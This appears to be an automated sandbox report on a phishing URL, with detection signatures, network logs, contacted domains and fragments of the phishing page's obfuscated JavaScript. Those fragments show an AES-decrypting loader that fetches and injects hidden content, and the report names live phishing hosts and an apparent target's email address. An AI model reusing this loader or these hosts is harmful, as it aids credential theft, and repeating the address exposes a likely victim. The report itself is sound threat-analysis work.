Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
http://email-tracking.jotelulu.com/c/eJx0yjFyhSAQANDTQBeHXVaFgiKN90B29ZMQdRCSGU-fyQFSv8dhHdmSlgAzOjIEnvQrgLeSVgTrMPlRmBmtoMA2-W1NE-gc0CCBMQ4mmCwNntfkeJxnEYpuc4rMx9mk9NKHdH7pEl6tXbey7woXhUvNdyySj17b8xcULj_XWz5S6Sy3wqXVmD7zsSu0u9R8D5dUeRSZ_YxxOOuua_gHvgP-BgAA__-1WEOb

Overview

General Information

Sample URL:	http://email-tracking.jotelulu.com/c/eJx0yjFyhSAQANDTQBeHXVaFgiKN90B29ZMQdRCSGU-fyQFSv8dhHdmSlgAzOjIEnvQrgLeSVgTrMPlRmBmtoMA2-W1NE-gc0CCBMQ4mmCwNntfkeJxnEYpuc4rMx9mk9NKHdH7pEl6tXbey7woXhUvNdyySj17b8xc
Analysis ID:	1529187

Detection

HTMLPhisher

Score:	68
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

AI detected phishing page

Yara detected HtmlPhish70

HTML page contains hidden URLs

HTML page contains obfuscated javascript

HTML page contains suspicious javascript code

HTML body contains low number of good links

HTML body contains password input but no form action

HTML body with high number of embedded images detected

HTML page contains hidden javascript code

HTML title does not match URL

Stores files to the Windows start menu directory

Uses Javascript AES encryption / decryption (likely to hide suspicious Javascript code)

Classification

×

Process Tree

System is w10x64_ra

chrome.exe (PID: 6236 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank" MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)

chrome.exe (PID: 6556 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2224 --field-trial-handle=1900,i,10416444873644335712,12567406530727459452,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)

chrome.exe (PID: 6356 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" "http://email-tracking.jotelulu.com/c/eJx0yjFyhSAQANDTQBeHXVaFgiKN90B29ZMQdRCSGU-fyQFSv8dhHdmSlgAzOjIEnvQrgLeSVgTrMPlRmBmtoMA2-W1NE-gc0CCBMQ4mmCwNntfkeJxnEYpuc4rMx9mk9NKHdH7pEl6tXbey7woXhUvNdyySj17b8xcULj_XWz5S6Sy3wqXVmD7zsSu0u9R8D5dUeRSZ_YxxOOuua_gHvgP-BgAA__-1WEOb" MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)

cleanup

Yara Signatures

HTML

Source	Rule	Description	Author	Strings
0.1.pages.csv	JoeSecurity_HtmlPhish_70	Yara detected HtmlPhish_70	Joe Security

Sigma Signatures

⊘No Sigma rule has matched

Suricata Signatures

⊘No Suricata rule has matched

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

Phishing

AI detected phishing page

Source: https://oracle-edw-optim-analytics-platform.se-sto-1.linodeobjects.com/index.html#6geris.perez@goaa.org

LLM: Score: 9 Reasons: The brand 'Microsoft' is a well-known global technology company., The URL 'oracle-edw-optim-analytics-platform.se-sto-1.linodeobjects.com' does not match the legitimate domain 'microsoft.com'., The URL contains multiple hyphens and unusual subdomains, which are common indicators of phishing., The domain 'linodeobjects.com' is associated with Linode, a cloud hosting provider, which could be used by anyone to host content, including potentially malicious actors., The presence of a password input field increases the risk, as phishing sites often attempt to capture sensitive information. DOM: 0.4.pages.csv

Yara detected HtmlPhish70

Source: Yara match

File source: 0.1.pages.csv, type: HTML

HTML page contains hidden URLs

Source: https://oracle-edw-optim-analytics-platform.se-sto-1.linodeobjects.com/index.html#6geris.perez@goaa.org

HTTP Parser: https://quantumazurao.com.de///4631.php

HTML page contains obfuscated javascript

Source: https://risaleinurtz.com/wp-includes/tracking/#geris.perez@goaa.org	HTTP Parser: var domainMatching = 'google'; var redirectUrl = 'https://oracle-edw-optim-analytic
Source: https://risaleinurtz.com/wp-includes/tracking/#geris.perez@goaa.org	HTTP Parser: var domainMatching = 'google'; var redirectUrl = 'https://oracle-edw-optim-analytic

HTML page contains suspicious javascript code

Source: https://oracle-edw-optim-analytics-platform.se-sto-1.linodeobjects.com/index.html#6geris.perez@goaa.org

HTTP Parser: window.location.href = atob(

Source: https://oracle-edw-optim-analytics-platform.se-sto-1.linodeobjects.com/index.html#6geris.perez@goaa.org

HTTP Parser: Number of links: 1

Source: https://oracle-edw-optim-analytics-platform.se-sto-1.linodeobjects.com/index.html#6geris.perez@goaa.org

HTTP Parser: <input type="password" .../> found but no <form action="...

Source: https://oracle-edw-optim-analytics-platform.se-sto-1.linodeobjects.com/index.html#6geris.perez@goaa.org

HTTP Parser: Total embedded image size: 45687

Source: https://oracle-edw-optim-analytics-platform.se-sto-1.linodeobjects.com/index.html#6geris.perez@goaa.org

HTTP Parser: Base64 decoded: {"a":"7N++aAXixO4+iI7U2ywn3jmQwJpaoDUr4s8rVnAefgs=","c":"54e7ae4f0ee8ab46f4e6802fdd541a3b","b":"7c9298b2a1098640439f8b29a666170a71eae05cd58ab13c44350fe5388d57aa6ec401f40d84e84ee46807fda778598fe77a83b740701d9f40ee131931f324a9de9774bd2abf57f5fa5a9efefd21fb7...

Source: https://oracle-edw-optim-analytics-platform.se-sto-1.linodeobjects.com/index.html#6geris.perez@goaa.org

HTTP Parser: Title: Continue to your sign-in does not match URL

Source: https://oracle-edw-optim-analytics-platform.se-sto-1.linodeobjects.com/index.html#6geris.perez@goaa.org

HTTP Parser: async function sacrum(vacantly){var{a,b,c,d}=json.parse(vacantly); return cryptojs.aes.decrypt(a, cryptojs.pbkdf2(cryptojs.enc.hex.parse(d), cryptojs.enc.hex.parse(b), {hasher: cryptojs.algo.sha512, keysize: 64/8, iterations: 999}),{iv:cryptojs.enc.hex.parse(c)}).tostring(cryptojs.enc.utf8); } async function rabbet() { yellowish.hidden= 0; kale.hidden = 1; document.write(await sacrum(await (await fetch(await sacrum(atob(`eyjhijoin04rk2fbwgl4tzqrauk3vtj5d24zam1rd0pwyw9evxi0czhyvm5bzwzncz0ilcjjijointrln2flngywzwu4ywi0nmy0zty4mdjmzgq1ndfhm2iilcjiijoin2m5mjk4yjjhmta5ody0mdqzowy4yji5yty2nje3mge3mwvhzta1y2q1ogfimtnjndqzntbmztuzodhkntdhytzlyzqwmwy0mgq4ngu4ngvlndy4mddmzge3nzg1othmztc3ytgzyjc0mdcwmwq5zjqwzwuxmze5mzfmmzi0ytlkztk3nzrizdjhymy1n2y1zme1ytllzmvmzdixzmi3mzywnmq4yzexyzfjmjeyngm2mzk2ywu1owvhmze4nge2mji2zjg2nge0mgyynwezmmu1owvmmtnkzjjizjg1yzmxyji5mjk0nzu4nzdmnjhkzdq4yzq5yzq5m2uwmdywmjdhmzk5mmm1zdy1mgjlmgnmowe3odrim2i3yziwmjm4zta4mddlyjawytayotg1zgrim...

Source: https://oracle-edw-optim-analytics-platform.se-sto-1.linodeobjects.com/index.html#6geris.perez@goaa.org

HTTP Parser: <input type="password" .../> found

Source: https://oracle-edw-optim-analytics-platform.se-sto-1.linodeobjects.com/index.html#6geris.perez@goaa.org	HTTP Parser: No favicon
Source: https://oracle-edw-optim-analytics-platform.se-sto-1.linodeobjects.com/index.html#6geris.perez@goaa.org	HTTP Parser: No favicon
Source: https://oracle-edw-optim-analytics-platform.se-sto-1.linodeobjects.com/index.html#6geris.perez@goaa.org	HTTP Parser: No favicon

Source: https://oracle-edw-optim-analytics-platform.se-sto-1.linodeobjects.com/index.html#6geris.perez@goaa.org

HTTP Parser: No <meta name="author".. found

Source: https://oracle-edw-optim-analytics-platform.se-sto-1.linodeobjects.com/index.html#6geris.perez@goaa.org

HTTP Parser: No <meta name="copyright".. found

Source: unknown	HTTPS traffic detected: 52.149.20.212:443 -> 192.168.2.16:49729 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 52.149.20.212:443 -> 192.168.2.16:49755 version: TLS 1.2

Source: chrome.exe

Memory has grown: Private usage: 21MB later: 28MB

Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	TCP traffic detected without corresponding DNS query: 20.189.173.10
Source: unknown	TCP traffic detected without corresponding DNS query: 20.189.173.10
Source: unknown	TCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknown	TCP traffic detected without corresponding DNS query: 20.189.173.10
Source: unknown	TCP traffic detected without corresponding DNS query: 192.229.211.108
Source: unknown	TCP traffic detected without corresponding DNS query: 20.189.173.10
Source: unknown	TCP traffic detected without corresponding DNS query: 192.229.211.108
Source: unknown	TCP traffic detected without corresponding DNS query: 192.229.211.108
Source: unknown	TCP traffic detected without corresponding DNS query: 192.229.211.108
Source: unknown	TCP traffic detected without corresponding DNS query: 52.149.20.212
Source: unknown	TCP traffic detected without corresponding DNS query: 52.149.20.212
Source: unknown	TCP traffic detected without corresponding DNS query: 52.149.20.212
Source: unknown	TCP traffic detected without corresponding DNS query: 52.149.20.212
Source: unknown	TCP traffic detected without corresponding DNS query: 52.149.20.212
Source: unknown	TCP traffic detected without corresponding DNS query: 52.149.20.212
Source: unknown	TCP traffic detected without corresponding DNS query: 52.149.20.212
Source: unknown	TCP traffic detected without corresponding DNS query: 52.149.20.212
Source: unknown	TCP traffic detected without corresponding DNS query: 52.149.20.212
Source: unknown	TCP traffic detected without corresponding DNS query: 52.149.20.212
Source: unknown	TCP traffic detected without corresponding DNS query: 52.149.20.212
Source: unknown	TCP traffic detected without corresponding DNS query: 52.149.20.212
Source: unknown	TCP traffic detected without corresponding DNS query: 52.149.20.212
Source: unknown	TCP traffic detected without corresponding DNS query: 52.149.20.212
Source: unknown	TCP traffic detected without corresponding DNS query: 52.149.20.212
Source: unknown	TCP traffic detected without corresponding DNS query: 192.229.211.108
Source: unknown	TCP traffic detected without corresponding DNS query: 20.189.173.10
Source: unknown	TCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic

HTTP traffic detected: GET /c/eJx0yjFyhSAQANDTQBeHXVaFgiKN90B29ZMQdRCSGU-fyQFSv8dhHdmSlgAzOjIEnvQrgLeSVgTrMPlRmBmtoMA2-W1NE-gc0CCBMQ4mmCwNntfkeJxnEYpuc4rMx9mk9NKHdH7pEl6tXbey7woXhUvNdyySj17b8xcULj_XWz5S6Sy3wqXVmD7zsSu0u9R8D5dUeRSZ_YxxOOuua_gHvgP-BgAA__-1WEOb HTTP/1.1Host: email-tracking.jotelulu.comConnection: keep-aliveUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9

Source: global traffic	DNS traffic detected: DNS query: email-tracking.jotelulu.com
Source: global traffic	DNS traffic detected: DNS query: risaleinurtz.com
Source: global traffic	DNS traffic detected: DNS query: www.google.com
Source: global traffic	DNS traffic detected: DNS query: goaa.org
Source: global traffic	DNS traffic detected: DNS query: oracle-edw-optim-analytics-platform.se-sto-1.linodeobjects.com
Source: global traffic	DNS traffic detected: DNS query: cdnjs.cloudflare.com
Source: global traffic	DNS traffic detected: DNS query: challenges.cloudflare.com
Source: global traffic	DNS traffic detected: DNS query: quantumazurao.com.de
Source: global traffic	DNS traffic detected: DNS query: code.jquery.com

Source: unknown	Network traffic detected: HTTP traffic on port 49733 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49744
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49743
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49742
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49741
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49740
Source: unknown	Network traffic detected: HTTP traffic on port 49727 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49743 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49739
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49738
Source: unknown	Network traffic detected: HTTP traffic on port 49717 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49736 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49737
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49736
Source: unknown	Network traffic detected: HTTP traffic on port 49759 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49735
Source: unknown	Network traffic detected: HTTP traffic on port 49753 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49734
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49733
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49732
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49731
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49730
Source: unknown	Network traffic detected: HTTP traffic on port 49732 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49724 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49742 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49728 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49749 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49729
Source: unknown	Network traffic detected: HTTP traffic on port 49752 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49728
Source: unknown	Network traffic detected: HTTP traffic on port 49714 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49727
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49726
Source: unknown	Network traffic detected: HTTP traffic on port 49718 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49725
Source: unknown	Network traffic detected: HTTP traffic on port 49735 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49724
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49723
Source: unknown	Network traffic detected: HTTP traffic on port 49739 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49731 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49678 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49725 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49741 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49729 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49748 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49745 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49718
Source: unknown	Network traffic detected: HTTP traffic on port 49751 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49717
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49716
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49759
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49714
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49757
Source: unknown	Network traffic detected: HTTP traffic on port 49738 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49755 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49755
Source: unknown	Network traffic detected: HTTP traffic on port 49757 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49734 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49754
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49753
Source: unknown	Network traffic detected: HTTP traffic on port 49673 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49752
Source: unknown	Network traffic detected: HTTP traffic on port 49730 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49751
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49750
Source: unknown	Network traffic detected: HTTP traffic on port 49726 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49740 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49747 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49744 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49723 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49716 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49750 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49749
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49748
Source: unknown	Network traffic detected: HTTP traffic on port 49754 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49747
Source: unknown	Network traffic detected: HTTP traffic on port 49737 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49745

Source: unknown	HTTPS traffic detected: 52.149.20.212:443 -> 192.168.2.16:49729 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 52.149.20.212:443 -> 192.168.2.16:49755 version: TLS 1.2

Source: classification engine

Classification label: mal68.phis.win@22/9@33/215

Source: C:\Program Files\Google\Chrome\Application\chrome.exe

File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps

Source: unknown	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank"
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2224 --field-trial-handle=1900,i,10416444873644335712,12567406530727459452,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Source: unknown	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" "http://email-tracking.jotelulu.com/c/eJx0yjFyhSAQANDTQBeHXVaFgiKN90B29ZMQdRCSGU-fyQFSv8dhHdmSlgAzOjIEnvQrgLeSVgTrMPlRmBmtoMA2-W1NE-gc0CCBMQ4mmCwNntfkeJxnEYpuc4rMx9mk9NKHdH7pEl6tXbey7woXhUvNdyySj17b8xcULj_XWz5S6Sy3wqXVmD7zsSu0u9R8D5dUeRSZ_YxxOOuua_gHvgP-BgAA__-1WEOb"
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2224 --field-trial-handle=1900,i,10416444873644335712,12567406530727459452,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Google Drive.lnk
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\YouTube.lnk
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Sheets.lnk
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Gmail.lnk
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Slides.lnk
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Docs.lnk

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	1 Scripting	Valid Accounts	Windows Management Instrumentation	1 Scripting	1 Process Injection	1 Masquerading	OS Credential Dumping	System Service Discovery	Remote Services	Data from Local System	2 Encrypted Channel	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	Scheduled Task/Job	1 Registry Run Keys / Startup Folder	1 Registry Run Keys / Startup Folder	1 Process Injection	LSASS Memory	Application Window Discovery	Remote Desktop Protocol	Data from Removable Media	2 Non-Application Layer Protocol	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	1 Extra Window Memory Injection	1 Deobfuscate/Decode Files or Information	Security Account Manager	Query Registry	SMB/Windows Admin Shares	Data from Network Shared Drive	3 Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	1 Extra Window Memory Injection	NTDS	System Network Configuration Discovery	Distributed Component Object Model	Input Capture	1 Ingress Tool Transfer	Traffic Duplication	Data Destruction

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

⊘No Antivirus matches

Dropped Files

⊘No Antivirus matches

Unpacked PE Files

⊘No Antivirus matches

Domains

⊘No Antivirus matches

URLs

⊘No Antivirus matches

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
risaleinurtz.com	188.125.160.35	true	false		unknown
code.jquery.com	151.101.130.137	true	false		unknown
cdnjs.cloudflare.com	104.17.24.14	true	false		unknown
challenges.cloudflare.com	104.18.94.41	true	false		unknown
www.google.com	216.58.206.68	true	false		unknown
quantumazurao.com.de	172.67.175.211	true	true		unknown
ha-dcx.jotelulu.com	185.31.22.130	true	false		unknown
email-tracking.jotelulu.com	unknown	unknown	false		unknown
oracle-edw-optim-analytics-platform.se-sto-1.linodeobjects.com	unknown	unknown	true		unknown
goaa.org	unknown	unknown	false		unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://email-tracking.jotelulu.com/c/eJx0yjFyhSAQANDTQBeHXVaFgiKN90B29ZMQdRCSGU-fyQFSv8dhHdmSlgAzOjIEnvQrgLeSVgTrMPlRmBmtoMA2-W1NE-gc0CCBMQ4mmCwNntfkeJxnEYpuc4rMx9mk9NKHdH7pEl6tXbey7woXhUvNdyySj17b8xcULj_XWz5S6Sy3wqXVmD7zsSu0u9R8D5dUeRSZ_YxxOOuua_gHvgP-BgAA__-1WEOb	false		unknown
https://oracle-edw-optim-analytics-platform.se-sto-1.linodeobjects.com/index.html#6geris.perez@goaa.org	true		unknown
https://risaleinurtz.com/wp-includes/tracking/#geris.perez@goaa.org	true		unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
104.21.83.121	unknown	United States		13335	CLOUDFLARENETUS	false
104.17.24.14	cdnjs.cloudflare.com	United States		13335	CLOUDFLARENETUS	false
1.1.1.1	unknown	Australia		13335	CLOUDFLARENETUS	false
142.250.74.206	unknown	United States		15169	GOOGLEUS	false
104.18.94.41	challenges.cloudflare.com	United States		13335	CLOUDFLARENETUS	false
104.18.95.41	unknown	United States		13335	CLOUDFLARENETUS	false
172.232.133.61	unknown	United States		20940	AKAMAI-ASN1EU	false
185.31.22.130	ha-dcx.jotelulu.com	Spain		29119	SERVIHOSTING-ASAireNetworksES	false
216.58.206.68	www.google.com	United States		15169	GOOGLEUS	false
151.101.130.137	code.jquery.com	United States		54113	FASTLYUS	false
172.67.175.211	quantumazurao.com.de	United States		13335	CLOUDFLARENETUS	true
142.250.181.227	unknown	United States		15169	GOOGLEUS	false
239.255.255.250	unknown	Reserved		unknown	unknown	false
142.250.185.131	unknown	United States		15169	GOOGLEUS	false
142.250.184.238	unknown	United States		15169	GOOGLEUS	false
151.101.194.137	unknown	United States		54113	FASTLYUS	false
188.125.160.35	risaleinurtz.com	Turkey		49632	DATATELEKOMTR	false
104.17.25.14	unknown	United States		13335	CLOUDFLARENETUS	false
66.102.1.84	unknown	United States		15169	GOOGLEUS	false

Private

IP
192.168.2.16

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1529187
Start date and time:	2024-10-08 18:22:11 +02:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	defaultwindowsinteractivecookbook.jbs
Sample URL:	http://email-tracking.jotelulu.com/c/eJx0yjFyhSAQANDTQBeHXVaFgiKN90B29ZMQdRCSGU-fyQFSv8dhHdmSlgAzOjIEnvQrgLeSVgTrMPlRmBmtoMA2-W1NE-gc0CCBMQ4mmCwNntfkeJxnEYpuc4rMx9mk9NKHdH7pEl6tXbey7woXhUvNdyySj17b8xcULj_XWz5S6Sy3wqXVmD7zsSu0u9R8D5dUeRSZ_YxxOOuua_gHvgP-BgAA__-1WEOb
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	13
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	EGA enabled
Analysis Mode:	stream
Analysis stop reason:	Timeout
Detection:	MAL
Classification:	mal68.phis.win@22/9@33/215

Warnings

Exclude process from analysis (whitelisted): SgrmBroker.exe, svchost.exe
Excluded IPs from analysis (whitelisted): 142.250.185.131, 142.250.184.238, 66.102.1.84, 34.104.35.123
Excluded domains from analysis (whitelisted): fs.microsoft.com, clients2.google.com, accounts.google.com, edgedl.me.gvt1.com, clientservices.googleapis.com, clients.l.google.com
Not all processes where analyzed, report is missing behavior information
VT rate limit hit for: http://email-tracking.jotelulu.com/c/eJx0yjFyhSAQANDTQBeHXVaFgiKN90B29ZMQdRCSGU-fyQFSv8dhHdmSlgAzOjIEnvQrgLeSVgTrMPlRmBmtoMA2-W1NE-gc0CCBMQ4mmCwNntfkeJxnEYpuc4rMx9mk9NKHdH7pEl6tXbey7woXhUvNdyySj17b8xcULj_XWz5S6Sy3wqXVmD7zsSu0u9R8D5dUeRSZ_YxxOOuua_gHvgP-BgAA__-1WEOb

LLM Input / Output

Input	Output
